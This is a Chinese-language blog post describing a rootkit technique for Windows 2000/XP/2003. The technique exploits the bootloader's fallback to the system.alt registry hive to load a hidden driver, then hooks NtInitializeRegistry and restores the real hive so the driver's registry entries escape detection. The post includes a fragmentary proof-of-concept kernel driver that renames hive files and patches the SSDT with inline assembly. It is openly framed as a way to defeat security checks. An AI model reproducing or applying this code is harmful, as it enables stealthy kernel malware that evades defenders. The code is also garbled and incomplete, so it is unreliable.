查看文章 |
几个月前,我曾在某些帖子谈论过这个技术 现在六一节到了,为了满足广大饥渴的小朋友们,特此放出 ===================================================== Mark在Windows Internals 4th(p 210)中提到过,WIN2000下,为了保持系统HIVE的完整性,系统在刷新SYSTEM HIVE的同时,会刷新一个名为“替补储巢”的hive :System.alt 当系统储巢System已经损坏,无法加载时,就会选择这个替补储巢system.alt来加载.这是由于win2000的ntldr不知道如何使用储巢日志文件(system.log)来进行储巢修复导致的,Mark称windows XP以后的系统已经抛弃了这一机制 但事实如何呢?首先我们来看一下某份NT4的代码: 下面这个函数是BootLoader(ntldr)用来加载系统HIVE的函数: strcpy(Directory,DirectoryPath); if(Status != ESUCCESS) { 可以看到,系统首先会尝试加载system hive,当systemroot\system32\config下的SYSTEM HIVE不存在或出现故障,则会尝试加载systemroot\system32\config下的system.alt HIVE 事实上,这部分代码一直保留在WINDOWS XP和WINDOWS 2003中,直到VISTA中才去除掉,VISTA系统中已更改为仅加载SYSTEM储巢,如果SYSTEM储巢加载失败,直接拒绝继续启动。 但是,这里只是NTLDR加载的储巢,这些储巢在系统启动后会被丢弃(保存在BootLoaderBlock中) SMSS将调用SSDT中的NtInitializeRegistry函数,通过CmpCmdInit->CmpInitializeHiveList,通过CmpLoadHiveThread系统线程为CmpMachineHiveList中的每个系统储巢做加载和初始化工作 这里系统只识别\SystemRoot\System32\Config\System储巢,如果无法加载这个储巢,系统将调用KeBugCheckEx使系统蓝屏,蓝屏代码为STATUS_CANNOT_LOAD_REGISTRY_FILE 有了上面的知识,我们很容易便可知道如何隐藏一个注册表了: 只要我们将当前SYSTEM储巢删除或者使其无法正确识别,然后在config目录下保留包含了我们的驱动服务项的SYSTEM.ALT储巢,此时重启系统,NTLDR会使用我们的SYETEM.ALT储巢,于是会加载我们的驱动程序 我们在驱动中,HOOK NtInitializeRegistry函数,等待NT内核再次初始化系统储巢,等到后,我们将SYSTEM储巢恢复(move file / fix file /redir file...),此时系统就能正常引导了 但是此时系统加载的是不包含我们的驱动服务项的储巢,所以任何利用正常、非正常枚举手法进行的检测,都检测不到我们的驱动注册表。无论是还原nt*key函数进行枚举,还是使用cm*key进行枚举,还是使用所谓的Hive解析技术进行枚举。 下面是一个这个驱动的小POC,代码如下: #include "ntddk.h" #define MYDEBUG 1 #if MYDEBUG #define KDMSG(_x_) DbgPrint _x_ #else #define KDMSG(_x_) #endif
KDMSG(("NtInitializeRegistry is call!")); if (SystemHiveIsBuild == FALSE) InitializeObjectAttributes(&oba , &FileName , OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE , 0 , 0 );
KDMSG(("open config\\system return %08x\n",stat)); if (!NT_SUCCESS(stat)) //now system hive is not found //move file renameinfo = (PFILE_RENAME_INFORMATION)ExAllocatePool(NonPagedPool , sizeof(FILE_RENAME_INFORMATION) + sizeof(RealSystemHiveLocation) - sizeof(WCHAR)); renameinfo->FileNameLength = sizeof(RealSystemHiveLocation) - sizeof(WCHAR); RtlInitUnicodeString(&FileName , L"\\SystemRoot\\System32\\SYSTEM"); KDMSG(("open system\\system return %08x\n" , stat)); if (!NT_SUCCESS(stat)) stat = ZwSetInformationFile(hfile , KDMSG(("rename file return %08x\n" , stat)); ZwClose(hfile); } end: return stat ; //IN WINDOWS XP , index of ZwInitializeRegistry is 0x5c __asm{ mov eax ,dword ptr[KeServiceDescriptorTable] mov ebx , dword ptr[eax + 0x5c * 4] mov OldNtInitializeRegistry , ebx mov ebx , NewNtInitializeRegistry mov dword ptr[eax + 0x5c * 4] , ebx mov eax , OldCr0 mov cr0 , eax sti pop ebx } return STATUS_SUCCESS ;
1.所谓绕过检查,就是要让系统在某一时刻认为你是存在的,而某一时刻认为你是不存在的,利用信息的不对称来使检查失效 2.NTLDR和NTOSKRNL之间,也算是一种信息不对称,例如TOPHET,例如本篇这个技巧,都是利用NTLDR中缺少某种机制,而NTOSKRNL中存在这种机制,由于NTLDR缺少这种机制(例如TOPHET中,访问SCSI驱动器的机制),那么自然给了攻击者可趁之机 当然,微软在VISTA中大大弥补了这些不对称,但是可想而知,还是有更多的未知等着大家去探索。
|
同上面
